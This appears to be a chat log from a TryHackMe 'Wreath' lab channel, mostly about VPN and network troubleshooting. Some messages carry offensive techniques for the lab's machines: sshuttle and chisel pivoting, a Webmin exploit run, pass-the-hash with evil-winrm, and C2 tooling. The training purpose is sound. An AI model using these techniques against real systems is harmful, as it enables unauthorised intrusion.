thank you

sonic peak
# strange bison It won't work then

Can confirm . Was banging my head on this same issue for 2 hours. I'm also using WSL.

─$ sshuttle -r root@10.200.84.200 10.200.84.150/8 --ssh-cmd "ssh -i id_rsa" -x 10.200.84.200
c : Connected to server.

Warning: ip6tables-legacy tables present, use ip6tables-legacy to see them

ip6tables v1.8.8 (nf_tables): CHAIN_ADD failed (No such file or directory): chain OUTPUT.......

surreal sail
#

I can’t get my wreath network vpn to work, anyone else?

It just says network unreachable

ocean jacinth
#

should you be able to ping 10.200.xx.100 from 10.200.xx.150?

gaunt raptor
#

is the network working?

merry robin
#

Yes

wind vine
#

Hi, this is related to https://tryhackme.com/room/wreath : Web server exploitation section:-- while running script :- I am getting this error python3 CVE-2019-15107.py . Please help
raceback (most recent call last):
File "/home/kali/tryhackme/AD/wreath/CVE-2019-15107/CVE-2019-15107.py", line 10, in <module>
from prompt_toolkit import prompt
File "/home/kali/.local/lib/python3.10/site-packages/prompt_toolkit/init.py", line 16, in <module>
from .interface import CommandLineInterface
File "/home/kali/.local/lib/python3.10/site-packages/prompt_toolkit/interface.py", line 19, in <module>
from .application import Application, AbortAction
File "/home/kali/.local/lib/python3.10/site-packages/prompt_toolkit/application.py", line 8, in <module>
from .key_binding.bindings.basic import load_basic_bindings
File "/home/kali/.local/lib/python3.10/site-packages/prompt_toolkit/key_binding/bindings/basic.py", line 9, in <module>
from prompt_toolkit.renderer import HeightIsUnknownError
File "/home/kali/.local/lib/python3.10/site-packages/prompt_toolkit/renderer.py", line 11, in <module>
from prompt_toolkit.styles import Style
File "/home/kali/.local/lib/python3.10/site-packages/prompt_toolkit/styles/init.py", line 8, in <module>
from .from_dict import *
File "/home/kali/.local/lib/python3.10/site-packages/prompt_toolkit/styles/from_dict.py", line 9, in <module>
from collections import Mapping
ImportError: cannot import name 'Mapping' from 'collections' (/usr/lib/python3.10/collections/init.py)

ionic tide
tacit crane
#

I'm unable to download another Wreath VPN file as well

surreal sail
#

I have the same issue as you guys.

#

404 on ovpn download

tacit crane
#

@surreal sail @ionic tide
Found the solution to the 404 error when generating a Wreath VPN, just leave the Wreath room.
To do this go to the and select the gear setting icon next to Help and press 'leave'. Then rejoin into the network and you should be able to generate a new Wreath VPN file

tacit crane
surreal sail
winter lintelBOT
#

Gave +1 Rep to @tacit crane

surreal sail
#

yep it works now odd that is didnt work when I did that before but o well

barren sage
#

we need one more reset plz

prime portal
#

anyone seen this before? I google the error and tried to make changes to the config file as well as restarted the service but that doesn't work.

prime portal
#

I put it in the current directory I’m working in. I didn’t put it in /root/.ssh

prime portal
strange bison
prime portal
strange bison
#

So someone's probably edited the authorized_keys file

prime portal
#

wow

#

thanks for the heads up

#

need 3 more ppl to vote to reset this

#

also because I was root I tried adding a user to the root group and logging in with my new user but it wouldn't let me fyi

strange bison
finite geyser
#

cant get ssh to work on wreath

#

connection closed by port 22

#

using verbose flags shows ' expecting SSH2_MSG_KEX_ECDH_REPLY '

strange bison
finite geyser
#

ive even tried adding a new user and generating ssh keys etc stillno dice

finite geyser
#

anyone willing to hop in the wreath room and vote to reset please?

#

2/5 right now

strange bison
#

Please state the 3rd octet to avoid unnecessary resets.

finite geyser
#

105

#

thanks!

#

were you able to manually reset the room @strange bison ?

strange bison
#

I was simply stating that your request needs more detail otherwise people would vote to reset when nothing is broken.

prime portal
#

10.200.90.200 for wreath is having the same issue please advise

#

to reset the box

prime portal
#

Has anyone done port forwarding on this box?

thin ginkgo
#

Can anyone help me a sec for the Wreath network? I downloaded the specific file for persistent access, but it does not let me connect using that file

#

With another VM, the SSH connection works, so it's an issue with my kali, can someone help?

#

This is the debug log

midnight citrus
#

hi may I get some help? i tried regenerating, clearing cache and trying different browsers and also different regions but unable to dl wreath's config file. i keep getting 404.

barren sage
barren sage
tepid bough
#

Looking for additional votes (currently 1/5 sadcooctus) to reset the 10.x.90.x network.
Hosts are unreachable.

barren bluff
tepid bough
winter lintelBOT
#

Gave +1 Rep to @barren bluff

surreal sail
#

same

#

10.x.90.x is fkn toying w me

#

ive been trying to get that shit working for like an hour now

#

need one more vote to reset please guys

surreal sail
#

done it

#

still broken

#

ping me when wreath fixed anyone <333

tepid bough
compact warren
#

got a problem right at the beginning, did the changes in /etc/hosts and can ping the url, but don't get anything in a browser, no matter if firefox or chromium

#

nevermind, got it

surreal sail
#

its not workin for me

#

on my vm

#

nvm i used wrong vpn file

#

my bad

surreal sail
compact warren
surreal sail
#

i got it eventually too

#

not same reason tho

surreal sail
#

i think someone fucked up the wreath network again

#

cant connect to the .200 machine via ssh

#

and im connected to the wreath network for sure, checked the website and openvpn running normally

#

god damnit

#

cant have shit here ive been trying to complete this for like 3 days

#

gonna get sub

jolly juniper
#

I can't download the ovpn...I get a message about smth got lost in the matrix

#

and even holo-network got problems

#

paid 10$ to do these boxes and they don't works

#

2/2

#

-.-

surreal sail
#

its tough :/

surreal sail
#

need only 2 more resets and it should work

#

this happened last time

#

and dont extend timer

strange bison
surreal sail
#

now i have to wait for 2 hrs to reset them myself

#

smh

#

ty

jolly juniper
#

problem is

#

i can't download the vpn file lol

#

looks like the file is corrupted or smth

#

or the path

surreal sail
#

wth

#

wdym

#

show ss

surreal sail
jolly juniper
#

no italy

#

how can i send ss

#

in here ?

surreal sail
#

can anyone get empire c2 working on parrot os

#

it keeps telling me unsupported os when installing from git clone

#

lmk

#

ty ❀️

solemn pike
#

not saying im connect to the vpn

#

any help would be appreciated

jolly juniper
#

I keep having a 404 error after I try to download the configuration file for wreath

#

anyone can help or is having the same issue ? The config works with Holo

#

also like is there any kind of way to contact a staff member in some way ?

#

cause I'm having issue on holo room with the nmap (only display the port 22 open instead of 22 and 80)

solemn pike
#

b'<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /web/exploit-Gumbygumberson.php was not found on this server.</p>\n</body></html>

#

this is out put when runnig python exploit

#

@wise kelp

#

never mind im an idiot

coral hamlet
#

Anyone on the x.x.101.x wreath network? Need help with a network resetπŸ˜…

echo spruce
jolly juniper
#

i tried to ask several time here but there is no support if anyone has any issue with the machines

#

very disappointed so far with the service

#

I paid smth and I can't use it

strange bison
#

The discord is ran by volunteers. It is not the official avenue for support.

merry robin
#

Also nothing we can do about that error in here -- including me, and I built the network.
It's been a long term problem. There are unofficial possible fixes, but the bug is as yet unfixed 😦

blazing rock
blazing rock
silver mauve
#

hey, what exactly happens after 9 days? Do I lose access or get a cooldown? I unintentionally started it and I am actually planning to use it after 13 days

strange bison
#

A different instance of Wreath

#

Basically it's to make sure there are as few idle users in the networks as possible

silver mauve
#

oh, ok

strange bison
#

Nothing to worry about at least

silver mauve
#

makes sense, can I pull out to avoid congestion from my end?

silver mauve
winter lintelBOT
#

Gave +1 Rep to @strange bison

supple vapor
#

Take the elevator to Mezzanine

frigid hound
#

Anybody know why I cant hit the hosts on the network even though my VPN says its connected on THM?

#

I was working on it earlier, my laptop restarted and now I just cant hit any of the hosts

ebon needle
#

I am having same issues with wreath. I am showing as connected in top green bar and also output openvpn shows connected. i am able to ping 10.10.10.10. but i cant run any scans or ping the host in the diagram

#

have regenerated my certificate already and rebooted my vm as a test already

supple vapor
#

Good Neighborhood

green sigil
#

is the starting machine 10.200.90.200 available? I see .250 but I don't see .200

pure inlet
#

I cant connect to wreath. I downloaded the configuration file and got error. Then I decide to read it with cat. There is nothing inside. It is literally 0 bytes. I downloaded again. Regenerate and download again. Nothing seems to working. Any ideas ?

tacit crane
#

For the 404 error when generating a VPN file
Just leave the Wreath room.
To do this go to the and select the gear setting icon next to Help and press 'leave'. Then rejoin into the network and you should be able to generate a new Wreath VPN file

wary raft
#

greetings all

#

im currently on task 13, doing the socat. i uploaded the socat binary, but the machine tells me that i couldnt run binaries

#

any work around on this ?

wary raft
#

ahhh

#

it works with static binaries

split harbor
atomic tendon
#

Hello everyone, I have a question, I am trying to download the Wreath Network but I am getting an error from THM website

sharp ice
atomic tendon
#

ok i will try it.

ebon temple
#

same problem for me

ebon temple
#

after leaving the room and entering again it worked!

atomic tendon
#

@sharp ice thanks , it works.

winter lintelBOT
#

Gave +1 Rep to @sharp ice

wary raft
winter lintelBOT
#

Gave +1 Rep to @split harbor

hexed barn
#

Hi, im currently doing task 6, but somehow after typing shell, the terminal froze and there's a problem with the script as well

merry robin
safe raven
#

Can anyone give me a hand, I am trying to ping the main machine(.200). I have downloaded the OVPN

#

I had access earlier and it stopped when the box ran out of time, I have left the room and rejoined but nothing is working

sharp ice
hexed barn
merry robin
hexed barn
#

Missed sudo πŸ˜‚

merry robin
# hexed barn Missed sudo πŸ˜‚

Eh, that's a workaround but throwing sudo at everything ain't the best idea in the world.
What was wrong? Why did it want higher permissions?

hexed barn
#

I saw the permission denied and thought there wasn't enough privilege

#

Decided to try sudo

merry robin
#

You're correct with that, but it shouldn't need sudo. What specifically was it trying to do when it got permission denied?

hexed barn
#

I was running whoami prior before that

#

Wasn't sure why the permission got denied

merry robin
hexed barn
#

Running commands.txt?

merry robin
#

It's trying to write to it. Look at the line above: prompt_toolkit/history.py, then the actual line is opening the file ab -- append bytes.

#

In other words, you don't have permission to write in the directory you've downloaded the script to

hexed barn
#

I see. Why don't i have the permission?

merry robin
#

No idea πŸ€·β€β™‚οΈ
Guessing you cloned it using sudo

hexed barn
merry robin
# hexed barn i did. will that affect things?

Yes. It will download the files as the root user, meaning they will be owned by the root user, not your own account.
Which is why you get permission denied. You don't own the directory.

hexed barn
#

Nice. Understood now. thanks

pale basin
#

I never suspect that I can login to windows just with hash, ❀️ evil-winrm, each day I am more fascinated to tryhackme and cybersecurity community.

manic wind
#

Hi anyone know of a way that I should be using extractor to get the website commit as this is the error

main blaze
#

Hi, i get a 404 if i want to download the vpn-file, could anybody help me? the regenrate of the file works.

atomic tendon
#

Hi, πŸ˜„
I am trying to create proxy tunnel using sshuttle however I am receiving this warning is this normal or not ?

─$ sudo sshuttle -r root@10.200.81.200 --ssh-cmd "ssh -i id_rsa" 10.200.81.0/24 -x 10.200.81.200
[sudo] password for offsec:
c : Connected to server.
Failed to flush caches: Unit dbus-org.freedesktop.resolve1.service not found.
fw: Received non-zero return code 1 when flushing DNS resolver cache.

atomic tendon
last ice
#

Hello, πŸ‘‹ I'm trying to download the VPN file buts it's saying 0bytes after download, It was working just fine yesterday

cedar mulch
cedar mulch
cedar mulch
atomic tendon
#

@cedar mulch thanks for the reply, what do you mean by full space?

winter lintelBOT
#

Gave +1 Rep to @cedar mulch

cedar mulch
atomic tendon
#

@cedar mulch I have 44% free space on my kali box. If thats what you mean

#

do you have a lot of experience in Penetration testing ?

cedar mulch
#

Not much, I'm level 8 in tryhackme

cedar mulch
atomic tendon
#

ok I will try

cedar mulch
#

If it doesn't work, try another browser.

atomic tendon
#

but I have another question

#

if you dont mind

cedar mulch
atomic tendon
#

let's say we have the same environment like wreath network, how can i set a pivoting to it without having any compromised box?

#

this is possible?

cedar mulch
#

You have to have access to an already compromised machine and on that machine there is another machine to which you do not have access, without connectivity to its network, even if you do not have that machine compromised. If for example you can see port 80/tcp, you can pivot to that port without having access to that machine

#

Example: I am machine A, and I have compromised machine B, from machine B I have access to machine C, but I do not have access to machine C from my machine A

#

I can pivot to have access to machine C from my machine A

atomic tendon
#

I see

cedar mulch
#

For that I have to listen with a pivoting program like chisel on machine A and execute port forwarding again with a pivoting program on machine C. That will send the data from machine C, through machine B to the machine A

atomic tendon
#

I guess you will run chisel on A and B boxes

cedar mulch
#

And later?

#

If you don't have access to machine B, you definitely won't have access to machine C, so there's no way you can do a port forward to machine C to machine A without having access to machine B, if that's what you mean

atomic tendon
#

you will be able to access box C from your A box browser

#

ok I got you

cedar mulch
#

You are machine A, and there are two more machines, you only have access to one which is B, but you do not have access to C, and there is also another machine, which is D, which can only be accessed from C When you have machine B compromised, you can listen there to forward the ports

atomic tendon
#

I understand, thanks for the explanation @cedar mulch

winter lintelBOT
#

Gave +1 Rep to @cedar mulch

manic wind
surreal sail
#

who else is in .57 subnet?

surreal sail
#

This is taking forever

#

curl is working just fine , foxy proxy is slow 😦

#

i forgot to turn it on NotLikeThis kekwsanta

#

just did it now it works

cedar mulch
undone yarrow
#

4/5 asked for reset.. if you have problem to access please push reset..

peak jetty
#

Hi! I just logged back in to continue wreath and I can't ping the first machine anymore. VPN is up (I regenerated my configuration file just in case), nothing changed on my kali VM, Wreath network seems to be up and running… Is there anything obvious I'm missing?

undone yarrow
#

I cant ping too.. need one more to reset machines..

peak jetty
#

Need 3 more on my subnet... Gonna work on something else in the meantime.

undone yarrow
#

ok

waxen nebula
#

Network 10.200.72.200, getting a 404 when downloading the .ovpn file, was previously getting a blank .ovpn file
Leaving and rejoining, regenerating and downloading still causes a 404
Regenerating the standard THM VPN file works fine.
Leaving again and rejoining put me into the 10.200.84.200 network. Regenerated the file and downloaded and now am connected

safe raven
real pollen
#

Just finished this network, that was awesome! ⭐️⭐️⭐️⭐️⭐️
Holo is next!

serene dagger
#

starting this network

#

greetings people

real pollen
serene dagger
#

getting a 404 trying to download the vpn config file

split harbor
serene dagger
#

thanks!

serene dagger
#

been trying for the pass hour and I am still getting a 404 trying to download the VPN config. Any help would be appreciated

warm barn
#

Using the tryhackme openvpn troubleshooting script I keep getting Fatal Error: Inline Certificate is invalid

#

The room was just reset it was working earlier I left the room rejoined and regenerated the file

#

Any other suggestions?

manic wind
#

I seem to be getting this error only on the wreath configuration file for openvpn but the regular openvpn access has no issue and I regenerated the vpn file

#

should I exit the room and try again?

manic wind
#

will have a look at the file

manic wind
#

yes the file is blank

golden iris
#

May I get some help on why my chisel isn't working on this network is that on purpose or am I just dumb? or can someone DM me to help, so I don't spam this room.

broken gull
#

Hello, yesterday I had no problem today I can't ping the machine while being on the VPN

astral fiber
astral fiber
#

got an issue when using sshuttle - task 18...

sshuttle -r root@10.200.105.150 --ssh-cmd "ssh -i id_rsa" 10.200.105.150/24 -x 10.200.105.150
ssh: connect to host 10.200.105.150 port 22: Connection timed out
c : fatal: failed to establish ssh session (2)

astral fiber
#

sorted it lol

thorn crystal
#

Hi, I have the python error when I try to execute the stager on .200

#

I can not upload the screenshot

gleaming rapids
#

Hey I am working my way through wreath and all was fine and good and then when I took a break and then came back I was no longer able to communicate with the network via command-line. The tryhackme access page shows that I am connected and the DNS for the website resolves and loads the site but I cannot ping, exploit or scan the IP address given even though all of these things were working before. I have already tried to kill my VPN session and go back in, regenerate and download my VPN file, restart the VM, leave the room and come back, etc all to no avail. Anyone have any ideas what might be up?

twilit mist
gleaming rapids
#

I believe the 10 day limit is for both subscribers or non subscribers to keep the network from being filled with inactive users. Nevertheless though I am subscribed and just joined the room yesterday so that is certainly not the issue here. Thanks for trying to help though.

twilit mist
#

I was able to launch 1 successful nmap scan after regenerating my VPN but now it is ignoring all communications from me again.

warm barn
#

I still am

mossy tiger
#

I'm getting a 404 error when trying to generate a VPN file for wreath network. I started the network waited 5 minutes, went to the VPN download page. clicked refresh. Waited 10 seconds aaaaand darth vader

#

Any ideas?

split harbor
#

leave and rejoin the room then retry the process of regening the ovpn file

dull leaf
#

the nc.exe getting detected by AntiVirus?

#

somehow ||wreath-pc\thomas|| not running curl properly πŸ€” .

#

oh okay, nvm

#

||Apparently windows\temp wasn't accessible to thomas :)||

mossy tiger
surreal sail
#

Hi

dull leaf
#

Wreath had wayy more new stuff for me than I expected ❣️

timid vessel
#

Hello, when I try to ssh in wreath network it tells me this: "Permission denied (publickey,gssapi-keyex,gssapi-with-mic)"

anyone else experiencing that?

azure wagon
#

Good morning! I was going to hop in the Wreath Network today but anytime I go to Access and try to get a special .vpn for Wreath Network, it gives me a 404 with a Dark Vader helmet. Any ideas?

cyan vine
#

404 When trying to download the Wreath Network VPN?

Can you head over to the room https://tryhackme.com/room/wreath

Press "options" -> "leave room"

After that, click here -> https://tryhackme.com/jr/wreath

Once you have rejoined the network, make sure to regenerate your new configuration file by heading to https://tryhackme.com/access, selecting the network from the dropdown, and finally clicking "regenerate"

Ensure to wait up to 2 minutes before downloading your OpenVPN file!

charred dagger
#

I also tried regenerating the file multiple times (and waiting a few minutes) but get the same issue

brazen crane
#

Have you guys been able to connect to the Wreath Box? I can't ping it anymore, and I've been able to get the OpenVPN setup working

charred dagger
#

Any update on the empty wreath VPN file from anyone?

flat crow
cold grail
#

I'm a subscriber using AttackBox, I launched an nmap scan for the first 15000 ports and got no reponse, maybe there is an issue on the network.
If there is any subscribers here, please push the button "Reset" in order to wipe the network config, up to now, there are 4/5 Reset, we need just one to reset the network configuration and maybe resolve all our initial issues.

#

4/5 asking for RESET, if you have an issue accessing the machine, push RESET button.

timid vessel
#

anyone else experiencing same problem?

azure wagon
#

I was the 5th reset. Hopefully this fixes it. I'm going to try again this weekend.

ruby schooner
#

it seems there is some issue with wreath room. as it is showing 'Network state: Resetting' for a very long time. Also from the attack box we are not able to connect to the vulnerable machine i.e 10.200.90.200

charred dagger
ruby schooner
charred dagger
#

Yes I agree

charred dagger
#

Has there been any updates on the network? I think I raised this issue at the start of the week but I haven't heard anything.

#

It's a bit annoying since I wanted to do this network before an exam next week.

merry robin
#

@fair breach could you check on this please? β™₯️

cunning island
#

hi! I am only getting blank vpn profiles for Wreath

#

tried rejoining the room, regenerating profiles, and nothing works

#

please and thanks for any help!

cunning island
charred dagger
winter lintelBOT
#

Gave +1 Rep to @cunning island

maiden root
strange bison
maiden root
strange bison
#

So you have left the room, waited, rejoined, regenerated, and waited?

maiden root
#

Correct.

#

I tried clearing cache etc too, not too sure what else I can do. I will follow those steps again.

strange bison
#

Welp, site is broke

maiden root
#

Yeah, not too sure.

cunning island
cunning island
#

Is there any movement on this?

maiden shuttle
#

I see were all having issues doing wreath with its vpn?

maiden shuttle
#

I tried the pinned resolution multiple times, no luck. VPN file downloads with no data

analog pike
#

yup

cunning island
#

@fair breach can you help us?

maiden shuttle
#

Yea im off this upcoming mon-thurs so itd be nice to use that learning with the Wreath room

azure surge
#

For me it's been in the state of resetting for over 2 hours now

flat crow
#

i'm still unable to Download the wreath vpn conf file just straight up 404, even when i try the recommended fixes. It's been like this for over 1 week now. 😦

rigid umbra
#

Hello everyone, does everyone have such a problem or is it just me?)

maiden shuttle
#

I have the same issue

sonic peak
#

add me to the list of people with the 0 byte Wreath openvpn file

lucid zodiac
#

me too!!!

ruby schooner
#

I am using tryhackme attackbox there also I can see a blank ovpn file

#

also I am not able to ping the vulnerable machine or through nmap

#

this is very weird

sonic peak
maiden shuttle
#

Wen vpn fix

patent dragon
#

Can someone start the machine ?. The button Start is disabled

exotic delta
#

Hello Hackers!!

#

I'm facing difficulty in RCE for the webserver. Can you please suggest something?

patent dragon
#

hi

maiden shuttle
#

Guess im doing holo instead 😦

split harbor
maiden shuttle
split harbor
#

well was worth confirming

steady hound
#

Hey guys. anyone has any idea on how to start with this network. I ve tried all steps mentioned but the network is still in resetting state.

maiden shuttle
#

Wreaths vpn appears to work again

umbral rune
#

Hey guys been using tryhackme for a while wanted to try out the wreath room upon starting the room the port scans were saying something like 'machine not responding to requests (i dont entirely remember it was late at night)' so I tried resetting the machine, it still hasnt come back up, its been nearly 48hours. What should I do here?

umbral rune
#

10.200.81.200

sharp ice
#

What does it say up here?

umbral rune
#

resetting

#

for about 48 hours

sharp ice
#

Try leaving the room, waiting 5 mins and re joining.

umbral rune
#

I have already tried that

#

to no avail

#

that box is cooked

sharp ice
#

Try leaving the room for longer then.

My network is stopped.

umbral rune
#

alright

#

this time it displayed a different subnet before joining, after joining went back to the same subnet which is still resetting. I mean ill try leaving it for an hour this time but idk if that will do anything

umbral rune
#

all good now finally got a different box cheers

robust narwhal
#

Hello,

Got onto Wreath, I have generated an ovpn file, the network state says: Running

However, the ping of the ip indicates Destination Host Unreachable

And nmap is not more conclusive:
nmap -p 1-15000 -oA thmwreathexternal 10.200.57.200

Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn

sharp ice
#

Did you try adding -Pn?

#

Nah, wreath isn't windows.

robust narwhal
#

Hi, I did but I think the issue is a lack of interaction between me and the distant resource.

hoary parrot
#

wreath vpn file is messed up

robust narwhal
lapis raft
#

Made my way to task 21. I'm able to connect to the middle server using a reverse shell, and created an account on server 2. However, when I try to connect with evil-winrm it's giving me an error (xfreerdp works with the account):

Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
Error: An error of type OpenSSL::Digest::DigestError happened, message is Digest initialization failed: initialization error
Error: Exiting with code 1 "

I can connect with xfreerdp but it looks like windows needs to be authenticated. I'm also not certain how to transfer files to the server using that tool...rookie.

I did find a post that mentions upgrading kali, so I've started that. Was wondering if anyone has suffered through this already.

clever bronze
#

Can't generate an openvpn config for wreath πŸ˜•

#

Keeps being downloaded as a blank file

leaden spire
#

EDIT: Was able to get a working .ovpn file for Wreath by leaving, waiting a bit, rejoining, waiting again, regenerate, wait, click download button :). The VPN troubleshooting script also noted my Kali box didn't have a tun0 interface and MTU value of 1500 wasn't working, but I feel like that's unrelated to the blank OVPN configs/404 error?
Anyone else still having issues downloading the Wreath .ovpn file? Clicking on the download button gives me a 404 error. I was able to recreate the issue in an incognito Chrome tab and Safari.
Safari for MacOS version: Version 16.3 (17614.4.6.11.4, 17614)
Chrome for MacOS version: Version 110.0.5481.77 (Official Build) (x86_64)
MacOS Monterey 12.6.3

winter lintelBOT
#

Gave +1 Rep to @leaden spire

leaden spire
merry robin
#

Think the TL;DR is: those servers are having issues πŸ˜†
Gonna have to wait until someone gets around to fixing them I'm afraid. I've spoken to a few staff members but no ETA just yet πŸ™‚

clever bronze
#

@merry robin same thing with Holo I'm guessing?

merry robin
#

No idea -- this is the only network channel I monitor

clever bronze
#

Ah, gotcha

hoary parrot
#

yes it having issue for over a week now

#

i was able to generate the ovpn file after leaving and coming back again than generate a new ovpn file and wait 2 mins. The next issue is when you try to connect to the network where it will enter an infinite loop of trying to connect but nothing happens

lapis raft
#

Story time.
so, I had problems with winrm and updated my kali box. One thread suggested updating kali so I did. It ran for a while and when it was done, I could no longer connect with openvpn. I got an error "Failed to open tun/tap interface."

I tried regenerating openvpn files but that didn't matter.

So, long story short, after wasting an hour on that, I found a sed cmd that seems to be working:

sed -i 's/cipher AES-256-CBC/data-ciphers AES-256-CBC/' *.ovpn

I ran that on the wreath ovpn and my user ovpn and both work now.

Now I can resurrect my annoyance with evil-winrm...

#

This is the extended error. The error starts about halfway down. Seems the sed command truncates the cipher name or something...IDK:

2023-02-11 11:03:41 SENT CONTROL [server]: 'PUSH_REQUEST' (status=1)
2023-02-11 11:03:41 PUSH: Received control message: 'PUSH_REPLY,route 10.10.0.0 255.255.0.0,route-metric 1000,route-gateway 10.6.0.1,topology subnet,ping 5,ping-restart 120,ifconfig 10.6.1.149 255.255.128.0,peer-id 98'
2023-02-11 11:03:41 OPTIONS IMPORT: timers and/or timeouts modified
2023-02-11 11:03:41 OPTIONS IMPORT: --ifconfig/up options modified
2023-02-11 11:03:41 OPTIONS IMPORT: route options modified
2023-02-11 11:03:41 OPTIONS IMPORT: route-related options modified
2023-02-11 11:03:41 OPTIONS IMPORT: peer-id set
2023-02-11 11:03:41 OPTIONS ERROR: failed to negotiate cipher with server. Add the server's cipher ('AES-256-CBC') to --data-ciphers (currently 'AES-256-GCM:AES-128-GCM:CHACHA20-POLY1305') if you want to connect to this server.
2023-02-11 11:03:41 ERROR: Failed to apply push options
2023-02-11 11:03:41 Failed to open tun/tap interface
2023-02-11 11:03:41 Converting soft SIGUSR1 received during exit notification to SIGTERM
2023-02-11 11:03:41 SIGTERM[soft,exit-with-notification] received, process exiting

lapis raft
#

Took me 2 days to solve because stupid ovpn didn't work. lol

lapis raft
maiden shuttle
lapis raft
winter lintelBOT
#

Gave +1 Rep to @maiden shuttle

clever bronze
#

@merry robin Do you happen to have the PNPT cert?

merry robin
clever bronze
#

Just curious, I have heard Wreath is really good practice for it. Was going to ask for your thoughts if they aligned

merry robin
#

From memory Wreath was out before PNPT was announced, I'm afraid -- it was certainly designed beforehand. Any alignment there is purely accidental, although I'm glad to hear it if so πŸ˜„

#

But no, I've not sat PNPT so I couldn't comment directly

clever bronze
#

πŸ‘

#

Would you say it's good practice for the OSCP? I have heard that now includes a lot of active directory components.

merry robin
#

The three main sections are also covered in PWK (although the content obviously differs), so from that perspective, I would consider it to be a good way to obtain an alternative or supplementary understanding of those topics.
That said, none of those three topics (pivoting, AV evasion, and C2 usage) are likely to come up in the exam, so πŸ€·β€β™‚οΈ

#

And yes, the new OSCP exam contains an active directory network. Wreath, uh, definitely does not help with that -- it doesn't cover AD.

clever bronze
#

Gotcha, thanks for the advice

icy urchin
#

prod_serv is unreachable for me, anyone else facing similar issue?

clever bronze
#

Currently working for me

icy urchin
#

noice! it is working, but I still wonder what was causing the issue.

devout palm
#

when i tired to download the vpn file for wreath page have 404 error ?Can't able to generate an openvpn config

clever bronze
forest vapor
winter lintelBOT
#

Gave +1 Rep to @forest vapor

clever bronze
#

Tunnels are so fun

past sparrow
#

machine dead?

clever bronze
past sparrow
#

it was working 20 min ago then it just died

#

not responding to pings or anything

past sparrow
#

back up

hallow knot
#

On the 404 opvn train :), see if it downloads later

hybrid plover
#

I can't download the wreath ovpn file, it says 404

knotty rapids
#

404 here as well

split harbor
#

have you tried to follow the instructions in the pinned message for leaving and rejoining the room then regening the config and waiting 2 mins then downloading it

clever bronze
#

Hey everyone, looking for some help with tunnels

Currently doing wreath and have a double tunnel, only thing is I can't get a NC through to test the connection

When running NC on the windows machine, It tells me the port which I'm local forwarding through the tunnel is open, then immediately closes. It doesn't try to establish a connection with the NC listener on the other side

Any tips?

clever bronze
#

Also I broke the firewall on 10.200.101.150

#

might need a reset

knotty rapids
#

I guess I am the only one still getting the 404?

split harbor
icy urchin
#

Getting the following error while using evil-winrm any suggestions?


Error: Exiting with code 1```
icy urchin
#

Anyone knows how to install Powershell-Empire on Arch Linux? I tried installing it from the AUR, but I have to resolve a lot of missing dependencies manually which does not seem like an ideal way to do it. The install script in the BC-Security project only works on Debian based distros.

hoary parrot
#

is it normal to get Load key "key": error in libcrypto

rigid umbra
#

Hi guys!
Has someone tried to adapt the exploit code for a web server for a full pseudoshell?
Task-20 is the first additional question.
Has anyone managed to do this?)

lucid zodiac
#

Who shut down the vulnerable service? It's immoral, okay?

#

Also, please don't reset the network at will. Please check whether it is your own problem first. It is immoral to reset the network at will.

#

Please consider other people's feelings and don't modify any passwords, services, etc. in the machine.

#

I have experienced the need to start over because someone changed my password and reset the network at will, and now I have experienced the vulnerability fixed by others.

#

Please follow the tryhackme rules, thank you.

merry robin
#

Dunno about immoral but it's definitely a dick move lmao

lucid zodiac
#

If the administrator can find out who did the good deed, please deal with it seriously. This is a public laboratory, not a private drone.

merry robin
#

What administrator kekw

knotty rapids
#

cant seem to view the web page for the room...

#

looks like it needs a reset...

fickle sable
#

I had that issue where I couldn't load any web pages and it was due to me having 2 openvpn connections active. Took me forever to figure it out

surreal sail
#

is someone able to get into the webserver? I keep getting "permission denied" although || I freshly extracted the private key?|| yesterday the same command worked just fine

grizzled river
#

Hello, I have problems in task 18, when I run sshuttle I can't access 10.200.x.150 in the browser, any solution?

solemn forge
#

On task 41, something seems odd. How are we able to upload a file from our attack machine to the personal PC?

  • We can connect to the webserver directly.
  • When we access the git server, we're pivoting through the webserver.
  • When we do a port scan on the personal PC, we're doing a double pivot.

Based on that, surely the personal PC shouldn't be able to access a web server on our attack machine? In the reverse shell, I can ping my attack machine, and tracert says that it's going via .250 (the OpenVPN server).

Putting it another way, is this a deliberate design choice, or an accident that we wouldn't encounter in a real-life scenario?

strange bison
merry robin
# solemn forge On task 41, something seems odd. How are we able to upload a file from our attac...

Think of your own home network -- your PC can reach out through NAT, but you can't connect straight to it from elsewhere on the planet, right?

Exactly the same thing. The way I pitched this network it was supposed to be a NAT network with a DMZ. Would have used different IP ranges to simulate that. e.g. the 10.x.x.200 address would have been your "public" IP assigned to the router with a port forward through to the webserver on something like 192.168.2.x, then the two Windows boxes would have been on something like 192.168.3.0/24 (ranges made up for simplicity). The insinuation being that there was a firewall restricting access from the DMZ to the private LAN, but poorly configured to accidentally allow bidirectional access to the git server rather than only inbound access.

#

Unfortunately AWS doesn't like that very much, so instead you get it simulated with security groups and a single IP range.

solemn forge
# merry robin Think of your own home network -- your PC can reach out through NAT, but you can...

Thanks for the reply, and I appreciate that AWS imposed some restrictions on what you'd like to do.

For me, the odd aspect is that the Git server can't connect straight back to my attack machine (e.g. I needed to create an HTTP-Hop listener in PowerShell Empire) whereas the personal PC can. Since they're on the same subnet, NAT shouldn't be a factor (i.e. both Windows machines should behave the same way). The only reasons for different behaviour are:
a) If the firewall is restricting outbound connections from the Git server but not from the PC.
b) If the Git server and PC have different routing tables (which I think is actually the case).

winter lintelBOT
#

Gave +1 Rep to @merry robin

merry robin
# solemn forge Thanks for the reply, and I appreciate that AWS imposed some restrictions on wha...

Oh, the git server.
The real reason for that is because pivoting was one of the three big objectives to teach and I wanted to up the difficulty on it lmao. In actuality it's a security group thing.

If you want an "in story" reason for it, you could say that it's an outbound firewall stopping the git server from accessing unapproved IP ranges. Unlike the PC (used for browsing, etc), there's no reason for a server which only runs a self-hosted repository manager to have unrestricted outbound access πŸ€·β€β™‚οΈ

solemn forge
winter lintelBOT
#

Gave +1 Rep to @merry robin

merry robin
#

Np! πŸ˜„

solemn forge
#

If anyone has access to instance 90, I think it needs a reset. E.g. I can't ping 10.200.90.200, and Nmap says that the ports are filtered.

